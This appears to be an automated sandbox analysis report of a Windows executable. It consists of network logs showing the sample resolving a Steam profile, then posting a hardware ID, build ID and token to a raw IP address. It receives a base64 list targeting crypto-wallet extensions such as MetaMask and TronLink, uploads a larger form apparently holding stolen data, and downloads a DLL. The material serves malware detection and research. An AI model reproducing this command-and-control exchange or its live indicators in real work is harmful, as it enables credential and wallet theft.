                                                                                                                                                                                                                          Oct 23, 2024 17:06:30.593322039 CEST4434995095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:30.593576908 CEST49950443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:30.593792915 CEST49950443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:30.593806028 CEST4434995095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:31.473650932 CEST4434995095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:31.473792076 CEST49950443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:31.474507093 CEST49950443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:31.474519968 CEST4434995095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:31.476506948 CEST49950443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:31.476519108 CEST4434995095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.121879101 CEST4434995095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.121998072 CEST49950443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.122023106 CEST4434995095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.122076988 CEST49950443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.122078896 CEST4434995095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.122134924 CEST49950443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.123209000 CEST49950443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.123230934 CEST4434995095.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.679421902 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.679478884 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.679563046 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.679902077 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:32.679914951 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.570305109 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.570467949 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.571057081 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.571065903 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572741985 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572758913 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572820902 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572833061 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572839022 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572849035 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572922945 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572942972 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572949886 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.572957039 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.573059082 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.573077917 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.573117018 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.573216915 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.573227882 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.573240042 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:33.573242903 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.138863087 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.138942003 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.138950109 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.138988018 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.139194012 CEST49963443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.139204025 CEST4434996395.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184135914 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184195995 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184273958 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184508085 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:35.184524059 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.063517094 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.063596010 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.064039946 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.064049006 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.065768957 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.065776110 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742535114 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742701054 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742710114 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742774010 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742958069 CEST49976443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.742978096 CEST4434997695.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744303942 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744345903 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744442940 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744750023 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:36.744770050 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.609251976 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.609359026 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.609863043 CEST49987443192.168.2.495.217.220.103
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.609875917 CEST4434998795.217.220.103192.168.2.4
                                                                                                                                                                                                                          Oct 23, 2024 17:06:37.611670971 CEST49987443192.168.2.495.217.220.103
Oct 23, 2024 17:06:37.611685038 CEST | 443 | 49987 | 95.217.220.103 | 192.168.2.4
Oct 23, 2024 17:06:38.286525011 CEST | 443 | 49987 | 95.217.220.103 | 192.168.2.4
Oct 23, 2024 17:06:38.286657095 CEST | 49987 | 443 | 192.168.2.4 | 95.217.220.103
Oct 23, 2024 17:06:38.286679983 CEST | 443 | 49987 | 95.217.220.103 | 192.168.2.4
Oct 23, 2024 17:06:38.286703110 CEST | 443 | 49987 | 95.217.220.103 | 192.168.2.4
Oct 23, 2024 17:06:38.286818981 CEST | 49987 | 443 | 192.168.2.4 | 95.217.220.103
Oct 23, 2024 17:06:38.286818981 CEST | 49987 | 443 | 192.168.2.4 | 95.217.220.103
Oct 23, 2024 17:06:38.286818981 CEST | 49987 | 443 | 192.168.2.4 | 95.217.220.103
Oct 23, 2024 17:06:38.585789919 CEST | 49987 | 443 | 192.168.2.4 | 95.217.220.103
Oct 23, 2024 17:06:38.585822105 CEST | 443 | 49987 | 95.217.220.103 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 17:05:23.262243986 CEST | 59635 | 53 | 192.168.2.4 | 1.1.1.1
Oct 23, 2024 17:05:23.270323992 CEST | 53 | 59635 | 1.1.1.1 | 192.168.2.4
Oct 23, 2024 17:06:38.302584887 CEST | 60748 | 53 | 192.168.2.4 | 1.1.1.1
Oct 23, 2024 17:06:38.312834978 CEST | 53 | 60748 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 23, 2024 17:05:23.262243986 CEST | 192.168.2.4 | 1.1.1.1 | 0xf0fe | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:06:38.302584887 CEST | 192.168.2.4 | 1.1.1.1 | 0x3a5b | Standard query (0) | cowod.hopto.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 23, 2024 17:05:23.270323992 CEST | 1.1.1.1 | 192.168.2.4 | 0xf0fe | No error (0) | steamcommunity.com |  | 92.122.104.90 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                          • 95.217.220.103
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 92.122.104.90 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:24 UTC | 119 | OUT | GET /profiles/76561199786602107 HTTP/1.1
                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-23 15:05:24 UTC | 1891 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://ste [TRUNCATED]
                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:24 GMT
                                                                                                                                                                                                                          Content-Length: 34570
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: sessionid=7c92fea456f6ef5b36f1b205; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                          Set-Cookie: steamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=None
2024-10-23 15:05:24 UTC | 14493 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-23 15:05:24 UTC | 10083 | IN | Data Ascii: tipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global
2024-10-23 15:05:24 UTC | 9994 | IN | Data Ascii: static.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49745 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:26 UTC | 187 | OUT | GET / HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-23 15:05:27 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:26 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
2024-10-23 15:05:27 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49747 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:28 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----DHCFIDAKJDHIECBFCBKK
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 255
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-23 15:05:28 UTC | 255 | OUT | Data Ascii:
------DHCFIDAKJDHIECBFCBKK
Content-Disposition: form-data; name="hwid"

E49243427485302599741-a33c7340-61ca
------DHCFIDAKJDHIECBFCBKK
Content-Disposition: form-data; name="build_id"

0b3bd69430b7d827b107ba2ed809207d
------DHCFIDAKJDHIECBFCBKK--
2024-10-23 15:05:28 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:28 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
2024-10-23 15:05:28 UTC | 69 | IN | Data Ascii:
3a
1|1|1|1|62641dabf289ea94f769f60cef180c7e|1|1|1|0|0|50000|1
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49748 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:29 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
2024-10-23 15:05:29 UTC | 331 | OUT | Data Ascii:
------BAEBGCFIEHCFIDGCAAFB
Content-Disposition: form-data; name="token"

62641dabf289ea94f769f60cef180c7e
------BAEBGCFIEHCFIDGCAAFB
Content-Disposition: form-data; name="build_id"

0b3bd69430b7d827b107ba2ed809207d
------BAEBGCFIEHCFIDGCAAFB
Cont
2024-10-23 15:05:30 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:05:30 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
2024-10-23 15:05:30 UTC | 1564 | IN | Data: [base64-encoded response body omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49749 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:31 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:31 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------BKKKEGIDBGHIDGDHDBFHCont
2024-10-23 15:05:31 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:05:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:31 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                          Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49750 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:32 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:32 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------IEHCAKKJDBKKFHJJDHIICont
2024-10-23 15:05:33 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:05:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:33 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49751 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:34 UTC | 280 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Content-Length: 7977
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:05:34 UTC7977OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 32 36 34 31 64 61 62 66 32 38 39 65 61 39 34 66 37 36 39 66 36 30 63 65 66 31 38 30 63 37 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 62 33 62 64 36 39 34 33 30 62 37 64 38 32 37 62 31 30 37 62 61 32 65 64 38 30 39 32 30 37 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                          Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"62641dabf289ea94f769f60cef180c7e------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build_id"0b3bd69430b7d827b107ba2ed809207d------CFHDHIJDGCBAKFIEGHCBCont
2024-10-23 15:05:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:05:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                                                          2024-10-23 15:05:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49752 | 95.217.220.103 | 443 | 5768 | C:\Users\user\Desktop\UMrFwHyjUi.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 15:05:35 UTC | 195 | OUT | GET /sqlp.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 95.217.220.103
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-23 15:05:36 UTC | 264 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Oct 2024 15:05:35 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Connection: close
Last-Modified: Wednesday, 23-Oct-2024 15:05:35 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                                                                                                                          Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
